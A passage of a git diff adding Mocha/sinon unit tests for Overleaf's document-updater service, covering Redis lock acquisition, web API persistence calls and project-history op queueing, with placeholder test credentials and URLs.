function () { + return this.callback.calledWith(null, this.lockValue).should.equal(true) + }) + }) + + describe('when the lock is initially set', function () { + beforeEach(function (done) { + this.lockValue = 'mock-lock-value' + const startTime = Date.now() + let tries = 0 + this.LockManager.LOCK_TEST_INTERVAL = 5 + this.LockManager.tryLock = (docId, callback) => { + if (callback == null) { + callback = function () {} + } + if (Date.now() - startTime < 20 || tries < 2) { + tries = tries + 1 + return callback(null, false) + } else { + return callback(null, true, this.lockValue) + } + } + sinon.spy(this.LockManager, 'tryLock') + + return this.LockManager.getLock(this.doc_id, (...args) => { + this.callback(...Array.from(args || [])) + return done() + }) + }) + + it('should call tryLock multiple times until free', function () { + return (this.LockManager.tryLock.callCount > 1).should.equal(true) + }) + + return it('should return the callback with the lock value', function () { + return this.callback.calledWith(null, this.lockValue).should.equal(true) + }) + }) + + return describe('when the lock times out', function () { + beforeEach(function (done) { + const time = Date.now() + this.LockManager.MAX_LOCK_WAIT_TIME = 5 + this.LockManager.tryLock = sinon.stub().callsArgWith(1, null, false) + return this.LockManager.getLock(this.doc_id, (...args) => { + this.callback(...Array.from(args || [])) + return done() + }) + }) + + return it('should return the callback with an error', function () { + return this.callback + .calledWith( + sinon.match + .instanceOf(Error) + .and(sinon.match.has('doc_id', this.doc_id)) + ) + .should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/LockManager/tryLockTests.js 
b/services/document-updater/test/unit/js/LockManager/tryLockTests.js new file mode 100644 index 0000000..861f733 --- /dev/null +++ b/services/document-updater/test/unit/js/LockManager/tryLockTests.js @@ -0,0 +1,155 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/LockManager.js' +const SandboxedModule = require('sandboxed-module') +const tk = require('timekeeper') + +describe('LockManager - trying the lock', function () { + beforeEach(function () { + let Profiler + this.LockManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/redis-wrapper': { + createClient: () => { + return { + auth() {}, + set: (this.set = sinon.stub()), + } + }, + }, + '@overleaf/metrics': { inc() {} }, + '@overleaf/settings': { + redis: { + lock: { + key_schema: { + blockingKey({ doc_id: docId }) { + return `Blocking:${docId}` + }, + }, + }, + }, + }, + './Profiler': + (this.Profiler = Profiler = + (function () { + Profiler = class Profiler { + static initClass() { + this.prototype.log = sinon + .stub() + .returns({ end: sinon.stub() }) + this.prototype.end = sinon.stub() + } + } + Profiler.initClass() + return Profiler + })()), + }, + }) + + this.callback = sinon.stub() + return (this.doc_id = 'doc-id-123') + }) + + describe('when the lock is not set', function () { + beforeEach(function () { + this.lockValue = 'mock-lock-value' + this.LockManager.randomLock = sinon.stub().returns(this.lockValue) + this.set.callsArgWith(5, null, 'OK') + return this.LockManager.tryLock(this.doc_id, this.callback) + }) + + it('should set the lock key with an expiry if it is not set', function () { + return this.set + .calledWith(`Blocking:${this.doc_id}`, this.lockValue, 'EX', 30, 'NX') + .should.equal(true) + }) + + return it('should return the callback with true and the lock value', function () { + return this.callback + .calledWith(null, true, this.lockValue) + .should.equal(true) + }) + }) + + describe('when the lock is already set', function () { + beforeEach(function () { + this.set.callsArgWith(5, null, null) + return this.LockManager.tryLock(this.doc_id, this.callback) + }) + + return it('should return the callback with false', function () { + return this.callback.calledWith(null, false).should.equal(true) + }) + }) + + return describe('when it takes a long time for redis to set the lock', function () { + beforeEach(function () { + tk.freeze(Date.now()) + this.lockValue = 'mock-lock-value' + this.LockManager.randomLock = sinon.stub().returns(this.lockValue) + this.LockManager.releaseLock = sinon.stub().callsArgWith(2, null) + this.set.callsFake((_key, _v, _ex, _ttl, _nx, cb) => { + tk.freeze(Date.now() + 7000) + cb(null, 'OK') + }) + }) + after(function () { + tk.reset() + }) + + describe('in all cases', function () { + beforeEach(function () { + return this.LockManager.tryLock(this.doc_id, this.callback) + }) + + it('should set the lock key with an expiry if it is not set', function () { + return this.set + .calledWith(`Blocking:${this.doc_id}`, this.lockValue, 'EX', 30, 'NX') + .should.equal(true) + }) + + return it('should try to release the lock', function () { + 
return this.LockManager.releaseLock + .calledWith(this.doc_id, this.lockValue) + .should.equal(true) + }) + }) + + describe('if the lock is released successfully', function () { + beforeEach(function () { + this.LockManager.releaseLock = sinon.stub().callsArgWith(2, null) + return this.LockManager.tryLock(this.doc_id, this.callback) + }) + + return it('should return the callback with false', function () { + return this.callback.calledWith(null, false).should.equal(true) + }) + }) + + return describe('if the lock has already timed out', function () { + beforeEach(function () { + this.LockManager.releaseLock = sinon + .stub() + .callsArgWith(2, new Error('tried to release timed out lock')) + return this.LockManager.tryLock(this.doc_id, this.callback) + }) + + return it('should return the callback with an error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/PersistenceManager/PersistenceManagerTests.js b/services/document-updater/test/unit/js/PersistenceManager/PersistenceManagerTests.js new file mode 100644 index 0000000..8c82677 --- /dev/null +++ b/services/document-updater/test/unit/js/PersistenceManager/PersistenceManagerTests.js @@ -0,0 +1,524 @@ +const sinon = require('sinon') +const modulePath = '../../../../app/js/PersistenceManager.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors') + +describe('PersistenceManager', function () { + beforeEach(function () { + this.request = sinon.stub() + this.request.defaults = () => this.request + this.Metrics = { + Timer: class Timer {}, + inc: sinon.stub(), + } + this.Metrics.Timer.prototype.done = sinon.stub() + this.Settings = {} + + this.PersistenceManager = SandboxedModule.require(modulePath, { + requires: { + requestretry: this.request, + '@overleaf/settings': this.Settings, + './Metrics': this.Metrics, + './Errors': Errors, + }, + }) + this.project_id = 'project-id-123' + this.projectHistoryId = 'history-id-123' + this.doc_id = 'doc-id-123' + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.callback = sinon.stub() + this.ranges = { comments: 'mock', entries: 'mock' } + this.pathname = '/a/b/c.tex' + this.lastUpdatedAt = Date.now() + this.lastUpdatedBy = 'last-author-id' + this.historyRangesSupport = false + this.Settings.apis = { + web: { + url: (this.url = 'www.example.com'), + user: (this.user = 'overleaf'), + pass: (this.pass = 'password'), + }, + } + }) + + describe('getDoc', function () { + beforeEach(function () { + this.webResponse = { + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + historyRangesSupport: this.historyRangesSupport, + } + }) + + describe('with a successful response from the web api', function () { + beforeEach(function () { + this.request.callsArgWith( + 1, + null, + { statusCode: 200 }, + JSON.stringify(this.webResponse) + ) + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should call the web api', function () { + this.request + .calledWith({ + url: `${this.url}/project/${this.project_id}/doc/${this.doc_id}`, + method: 'GET', + headers: { + accept: 'application/json', + }, + auth: { + user: this.user, + pass: this.pass, + sendImmediately: true, + }, + jar: false, + timeout: 5000, + }) + .should.equal(true) + }) + + it('should call the callback with the doc lines, version and 
ranges', function () { + this.callback + .calledWith( + null, + this.lines, + this.version, + this.ranges, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport + ) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('getDoc', 1, { status: 200 }) + .should.equal(true) + }) + }) + + describe('with the peek option', function () { + beforeEach(function () { + this.request.yields( + null, + { statusCode: 200 }, + JSON.stringify(this.webResponse) + ) + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + { peek: true }, + this.callback + ) + }) + + it('should call the web api with a peek param', function () { + this.request + .calledWith({ + url: `${this.url}/project/${this.project_id}/doc/${this.doc_id}`, + qs: { peek: 'true' }, + method: 'GET', + headers: { + accept: 'application/json', + }, + auth: { + user: this.user, + pass: this.pass, + sendImmediately: true, + }, + jar: false, + timeout: 5000, + }) + .should.equal(true) + }) + }) + + describe('when request returns an error', function () { + beforeEach(function () { + this.error = new Error('oops') + this.error.code = 'EOOPS' + this.request.callsArgWith(1, this.error, null, null) + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return a generic connection error', function () { + this.callback + .calledWith( + sinon.match + .instanceOf(Error) + .and(sinon.match.has('message', 'error connecting to web API')) + ) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('getDoc', 1, { status: 'EOOPS' }) + .should.equal(true) + }) + }) + + describe('when the request returns 404', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 404 }, '') + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return a NotFoundError', function () { + this.callback + .calledWith(sinon.match.instanceOf(Errors.NotFoundError)) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('getDoc', 1, { status: 404 }) + .should.equal(true) + }) + }) + + describe('when the request returns 413', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 413 }, '') + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return a FileTooLargeError', function () { + this.callback + .calledWith(sinon.match.instanceOf(Errors.FileTooLargeError)) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('getDoc', 1, { status: 413 }) + .should.equal(true) + }) + }) + + describe('when the request returns an error status code', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 500 }, '') + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should 
return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('getDoc', 1, { status: 500 }) + .should.equal(true) + }) + }) + + describe('when request returns a doc without lines', function () { + beforeEach(function () { + delete this.webResponse.lines + this.request.callsArgWith( + 1, + null, + { statusCode: 200 }, + JSON.stringify(this.webResponse) + ) + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('when request returns a doc without a version', function () { + beforeEach(function () { + delete this.webResponse.version + this.request.callsArgWith( + 1, + null, + { statusCode: 200 }, + JSON.stringify(this.webResponse) + ) + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('when request returns a doc without a pathname', function () { + beforeEach(function () { + delete this.webResponse.pathname + this.request.callsArgWith( + 1, + null, + { statusCode: 200 }, + JSON.stringify(this.webResponse) + ) + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + }) + + describe('setDoc', function () { + describe('with a successful response from the web api', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 200 }) + this.PersistenceManager.setDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.lastUpdatedAt, + this.lastUpdatedBy, + this.callback + ) + }) + + it('should call the web api', function () { + this.request + .calledWith({ + url: `${this.url}/project/${this.project_id}/doc/${this.doc_id}`, + json: { + lines: this.lines, + version: this.version, + ranges: this.ranges, + lastUpdatedAt: this.lastUpdatedAt, + lastUpdatedBy: this.lastUpdatedBy, + }, + method: 'POST', + auth: { + user: this.user, + pass: this.pass, + sendImmediately: true, + }, + jar: false, + timeout: 5000, + }) + .should.equal(true) + }) + + it('should call the callback without error', function () { + this.callback.calledWith(null).should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('setDoc', 1, { status: 200 }) + .should.equal(true) + }) + }) + + describe('when request returns an error', function () { + beforeEach(function () { + this.error = new Error('oops') + this.error.code = 'EOOPS' + this.request.callsArgWith(1, this.error, null, null) + this.PersistenceManager.setDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.lastUpdatedAt, + this.lastUpdatedBy, + this.callback + ) + }) + + it('should return a generic connection error', function () { + this.callback + .calledWith( + sinon.match + .instanceOf(Error) + 
.and(sinon.match.has('message', 'error connecting to web API')) + ) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('setDoc', 1, { status: 'EOOPS' }) + .should.equal(true) + }) + }) + + describe('when the request returns 404', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 404 }, '') + this.PersistenceManager.setDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.lastUpdatedAt, + this.lastUpdatedBy, + this.callback + ) + }) + + it('should return a NotFoundError', function () { + this.callback + .calledWith(sinon.match.instanceOf(Errors.NotFoundError)) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('setDoc', 1, { status: 404 }) + .should.equal(true) + }) + }) + + describe('when the request returns 413', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 413 }, '') + this.PersistenceManager.setDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.lastUpdatedAt, + this.lastUpdatedBy, + this.callback + ) + }) + + it('should return a FileTooLargeError', function () { + this.callback + .calledWith(sinon.match.instanceOf(Errors.FileTooLargeError)) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('setDoc', 1, { status: 413 }) + .should.equal(true) + }) + }) + + describe('when the request returns an error status code', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 500 }, '') + this.PersistenceManager.setDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.lastUpdatedAt, + this.lastUpdatedBy, + this.callback + ) + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('setDoc', 1, { status: 500 }) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ProjectHistoryRedisManager/ProjectHistoryRedisManagerTests.js b/services/document-updater/test/unit/js/ProjectHistoryRedisManager/ProjectHistoryRedisManagerTests.js new file mode 100644 index 0000000..760385b --- /dev/null +++ b/services/document-updater/test/unit/js/ProjectHistoryRedisManager/ProjectHistoryRedisManagerTests.js @@ -0,0 +1,610 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../../app/js/ProjectHistoryRedisManager.js' +const SandboxedModule = require('sandboxed-module') +const tk = require('timekeeper') + +describe('ProjectHistoryRedisManager', function () { + beforeEach(function () { + this.project_id = 'project-id-123' + this.projectHistoryId = 'history-id-123' + this.user_id = 'user-id-123' + this.rclient = {} + this.source = 'editor' + tk.freeze(new Date()) + + this.Limits = { + docIsTooLarge: 
sinon.stub().returns(false), + } + + this.ProjectHistoryRedisManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.settings = { + max_doc_length: 123, + redis: { + project_history: { + key_schema: { + projectHistoryOps({ project_id: projectId }) { + return `ProjectHistory:Ops:${projectId}` + }, + projectHistoryFirstOpTimestamp({ project_id: projectId }) { + return `ProjectHistory:FirstOpTimestamp:${projectId}` + }, + }, + }, + }, + }), + '@overleaf/redis-wrapper': { + createClient: () => this.rclient, + }, + './Metrics': (this.metrics = { summary: sinon.stub() }), + './Limits': this.Limits, + }, + }) + }) + + afterEach(function () { + tk.reset() + }) + + describe('queueOps', function () { + beforeEach(async function () { + this.ops = ['mock-op-1', 'mock-op-2'] + this.multi = { exec: sinon.stub().resolves([1]) } + this.multi.rpush = sinon.stub() + this.multi.setnx = sinon.stub() + this.rclient.multi = () => this.multi + await this.ProjectHistoryRedisManager.promises.queueOps( + this.project_id, + ...this.ops + ) + }) + + it('should queue an update', function () { + this.multi.rpush + .calledWithExactly( + `ProjectHistory:Ops:${this.project_id}`, + this.ops[0], + this.ops[1] + ) + .should.equal(true) + }) + + it('should set the queue timestamp if not present', function () { + this.multi.setnx + .calledWithExactly( + `ProjectHistory:FirstOpTimestamp:${this.project_id}`, + Date.now() + ) + .should.equal(true) + }) + }) + + describe('queueRenameEntity', function () { + beforeEach(async function () { + this.file_id = 1234 + + this.rawUpdate = { + pathname: (this.pathname = '/old'), + newPathname: (this.newPathname = '/new'), + version: (this.version = 2), + } + + this.ProjectHistoryRedisManager.promises.queueOps = sinon + .stub() + .resolves() + await this.ProjectHistoryRedisManager.promises.queueRenameEntity( + this.project_id, + this.projectHistoryId, + 'file', + this.file_id, + this.user_id, + this.rawUpdate, + this.source + ) + }) + + it('should queue an update', function () { + const update = { + pathname: this.pathname, + new_pathname: this.newPathname, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + file: this.file_id, + } + + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(update)) + .should.equal(true) + }) + }) + + describe('queueAddEntity', function () { + beforeEach(function () { + this.doc_id = 1234 + + this.rawUpdate = { + pathname: (this.pathname = '/old'), + docLines: (this.docLines = 'a\nb'), + version: (this.version = 2), + } + + this.ProjectHistoryRedisManager.promises.queueOps = sinon + .stub() + .resolves() + }) + + it('should queue an update', async function () { + this.rawUpdate.url = this.url = 'filestore.example.com' + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + this.project_id, + this.projectHistoryId, + 'doc', + this.doc_id, + this.user_id, + this.rawUpdate, + this.source + ) + + const update = { + pathname: this.pathname, + docLines: this.docLines, + url: this.url, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + createdBlob: false, + doc: this.doc_id, + } + + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(update)) + .should.equal(true) + }) + + it('should queue an update with file metadata', async 
function () { + const metadata = { + importedAt: '2024-07-30T09:14:45.928Z', + provider: 'references-provider', + } + const projectId = 'project-id' + const fileId = 'file-id' + const url = `http://filestore/project/${projectId}/file/${fileId}` + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + projectId, + this.projectHistoryId, + 'file', + fileId, + this.user_id, + { + pathname: 'foo.png', + url, + version: 42, + hash: '1337', + metadata, + }, + this.source + ) + + const update = { + pathname: 'foo.png', + docLines: undefined, + url, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: 42, + hash: '1337', + metadata, + projectHistoryId: this.projectHistoryId, + createdBlob: false, + file: fileId, + } + + expect( + this.ProjectHistoryRedisManager.promises.queueOps.args[0][1] + ).to.equal(JSON.stringify(update)) + this.ProjectHistoryRedisManager.promises.queueOps.should.have.been.calledWithExactly( + projectId, + JSON.stringify(update) + ) + }) + + it('should forward history compatible ranges if history ranges support is enabled', async function () { + this.rawUpdate.historyRangesSupport = true + this.docLines = 'the quick fox jumps over the lazy dog' + + const ranges = { + changes: [ + { + op: { p: 4, i: 'quick' }, + metadata: { ts: '2024-01-01T00:00:00.000Z', user_id: 'user-1' }, + }, + { + op: { p: 9, d: ' brown' }, + metadata: { ts: '2024-02-01T00:00:00.000Z', user_id: 'user-1' }, + }, + { + op: { p: 14, i: 'jumps' }, + metadata: { ts: '2024-02-01T00:00:00.000Z', user_id: 'user-1' }, + }, + ], + comments: [ + { + op: { p: 29, c: 'lazy', t: 'comment-1' }, + metadata: { resolved: false }, + }, + ], + } + this.rawUpdate.ranges = ranges + this.rawUpdate.docLines = this.docLines + + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + this.project_id, + this.projectHistoryId, + 'doc', + this.doc_id, + this.user_id, + this.rawUpdate, + this.source + ) + + const historyCompatibleRanges = { + comments: [ + { + op: { p: 29, c: 'lazy', t: 'comment-1', hpos: 35 }, + metadata: { resolved: false }, + }, + ], + changes: [ + { + op: { p: 4, i: 'quick' }, + metadata: { ts: '2024-01-01T00:00:00.000Z', user_id: 'user-1' }, + }, + { + op: { p: 9, d: ' brown' }, + metadata: { ts: '2024-02-01T00:00:00.000Z', user_id: 'user-1' }, + }, + { + op: { p: 14, i: 'jumps', hpos: 20 }, + metadata: { ts: '2024-02-01T00:00:00.000Z', user_id: 'user-1' }, + }, + ], + } + + const update = { + pathname: this.pathname, + docLines: 'the quick brown fox jumps over the lazy dog', + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + createdBlob: false, + ranges: historyCompatibleRanges, + doc: this.doc_id, + } + + expect( + this.ProjectHistoryRedisManager.promises.queueOps + ).to.have.been.calledWithExactly(this.project_id, JSON.stringify(update)) + }) + + it('should not forward ranges if history ranges support is disabled', async function () { + this.rawUpdate.historyRangesSupport = false + + const ranges = { + changes: [ + { + op: { p: 0, i: 'foo' }, + metadata: { ts: '2024-01-01T00:00:00.000Z', user_id: 'user-1' }, + }, + { + op: { p: 7, d: ' baz' }, + metadata: { ts: '2024-02-01T00:00:00.000Z', user_id: 'user-1' }, + }, + ], + comments: [ + { + op: { p: 4, c: 'bar', t: 'comment-1' }, + metadata: { resolved: false }, + }, + ], + } + this.rawUpdate.ranges = ranges + + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + this.project_id, + 
this.projectHistoryId, + 'doc', + this.doc_id, + this.user_id, + this.rawUpdate, + this.source + ) + + const update = { + pathname: this.pathname, + docLines: this.docLines, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + createdBlob: false, + doc: this.doc_id, + } + + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(update)) + .should.equal(true) + }) + + it('should not forward ranges if history ranges support is undefined', async function () { + const ranges = { + changes: [ + { + op: { p: 0, i: 'foo' }, + metadata: { ts: '2024-01-01T00:00:00.000Z', user_id: 'user-1' }, + }, + { + op: { p: 7, d: ' baz' }, + metadata: { ts: '2024-02-01T00:00:00.000Z', user_id: 'user-1' }, + }, + ], + comments: [ + { + op: { p: 4, c: 'bar', t: 'comment-1' }, + metadata: { resolved: false }, + }, + ], + } + this.rawUpdate.ranges = ranges + + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + this.project_id, + this.projectHistoryId, + 'doc', + this.doc_id, + this.user_id, + this.rawUpdate, + this.source + ) + + const update = { + pathname: this.pathname, + docLines: this.docLines, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + createdBlob: false, + doc: this.doc_id, + } + + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(update)) + .should.equal(true) + }) + + it('should pass "false" as the createdBlob field if not provided', async function () { + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + this.project_id, + this.projectHistoryId, + 'doc', + this.doc_id, + this.user_id, + this.rawUpdate, + this.source + ) + + const update = { + pathname: this.pathname, + docLines: this.docLines, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + createdBlob: false, + doc: this.doc_id, + } + + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(update)) + .should.equal(true) + }) + + it('should pass through the value of the createdBlob field', async function () { + this.rawUpdate.createdBlob = true + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + this.project_id, + this.projectHistoryId, + 'doc', + this.doc_id, + this.user_id, + this.rawUpdate, + this.source + ) + + const update = { + pathname: this.pathname, + docLines: this.docLines, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + createdBlob: true, + doc: this.doc_id, + } + + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(update)) + .should.equal(true) + }) + }) + + describe('queueResyncProjectStructure', function () { + it('should queue an update', function () {}) + }) + + describe('queueResyncDocContent', function () { + beforeEach(function () { + this.doc_id = 1234 + this.lines = ['one', 'two'] + this.ranges = { + changes: [{ op: { i: 'ne', p: 1 } }, { op: { d: 'deleted', p: 3 } }], + } + this.resolvedCommentIds = ['comment-1'] + this.version = 2 + this.pathname = '/path' + + this.ProjectHistoryRedisManager.promises.queueOps = sinon + .stub() + 
.resolves() + }) + + describe('with a good doc', function () { + beforeEach(async function () { + this.update = { + resyncDocContent: { + content: 'one\ntwo', + version: this.version, + }, + projectHistoryId: this.projectHistoryId, + path: this.pathname, + doc: this.doc_id, + meta: { ts: new Date() }, + } + + await this.ProjectHistoryRedisManager.promises.queueResyncDocContent( + this.project_id, + this.projectHistoryId, + this.doc_id, + this.lines, + this.ranges, + this.resolvedCommentIds, + this.version, + this.pathname, + false + ) + }) + + it('should check if the doc is too large', function () { + this.Limits.docIsTooLarge + .calledWith( + JSON.stringify(this.update).length, + this.lines, + this.settings.max_doc_length + ) + .should.equal(true) + }) + + it('should queue an update', function () { + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(this.update)) + .should.equal(true) + }) + }) + + describe('with a doc that is too large', function () { + beforeEach(async function () { + this.Limits.docIsTooLarge.returns(true) + await expect( + this.ProjectHistoryRedisManager.promises.queueResyncDocContent( + this.project_id, + this.projectHistoryId, + this.doc_id, + this.lines, + this.ranges, + this.resolvedCommentIds, + this.version, + this.pathname, + false + ) + ).to.be.rejected + }) + + it('should not queue an update if the doc is too large', function () { + this.ProjectHistoryRedisManager.promises.queueOps.called.should.equal( + false + ) + }) + }) + + describe('when history ranges support is enabled', function () { + beforeEach(async function () { + this.update = { + resyncDocContent: { + content: 'onedeleted\ntwo', + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + }, + projectHistoryId: this.projectHistoryId, + path: this.pathname, + doc: this.doc_id, + meta: { ts: new Date() }, + } + + await this.ProjectHistoryRedisManager.promises.queueResyncDocContent( + this.project_id, + this.projectHistoryId, + this.doc_id, + this.lines, + this.ranges, + this.resolvedCommentIds, + this.version, + this.pathname, + true + ) + }) + + it('should include tracked deletes in the update', function () { + this.ProjectHistoryRedisManager.promises.queueOps.should.have.been.calledWithExactly( + this.project_id, + JSON.stringify(this.update) + ) + }) + + it('should check the doc length without tracked deletes', function () { + this.Limits.docIsTooLarge.should.have.been.calledWith( + JSON.stringify(this.update).length, + this.lines, + this.settings.max_doc_length + ) + }) + + it('should queue an update', function () { + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(this.update)) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ProjectManager/flushAndDeleteProjectTests.js b/services/document-updater/test/unit/js/ProjectManager/flushAndDeleteProjectTests.js new file mode 100644 index 0000000..b92fc8b --- /dev/null +++ b/services/document-updater/test/unit/js/ProjectManager/flushAndDeleteProjectTests.js @@ -0,0 +1,157 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
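+// For example, the DS101/DS102 patterns flagged below currently read like +// return Array.from(this.doc_ids).map(docId => expectation(docId)) +// and could be reworked (a sketch only; 'expectation' stands in for the +// per-doc assertion used in this file) as a plain loop with no return value: +// for (const docId of this.doc_ids) { expectation(docId) }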
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/ProjectManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('ProjectManager - flushAndDeleteProject', function () { + beforeEach(function () { + let Timer + this.LockManager = { + getLock: sinon.stub().yields(), + releaseLock: sinon.stub().yields(), + } + this.ProjectManager = SandboxedModule.require(modulePath, { + requires: { + './RedisManager': (this.RedisManager = {}), + './ProjectHistoryRedisManager': (this.ProjectHistoryRedisManager = {}), + './DocumentManager': (this.DocumentManager = {}), + './HistoryManager': (this.HistoryManager = { + flushProjectChanges: sinon.stub().callsArg(2), + }), + './LockManager': this.LockManager, + './Metrics': (this.Metrics = { + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + }), + }, + }) + this.project_id = 'project-id-123' + return (this.callback = sinon.stub()) + }) + + describe('successfully', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.RedisManager.getDocIdsInProject = sinon + .stub() + .callsArgWith(1, null, this.doc_ids) + this.DocumentManager.flushAndDeleteDocWithLock = sinon.stub().callsArg(3) + 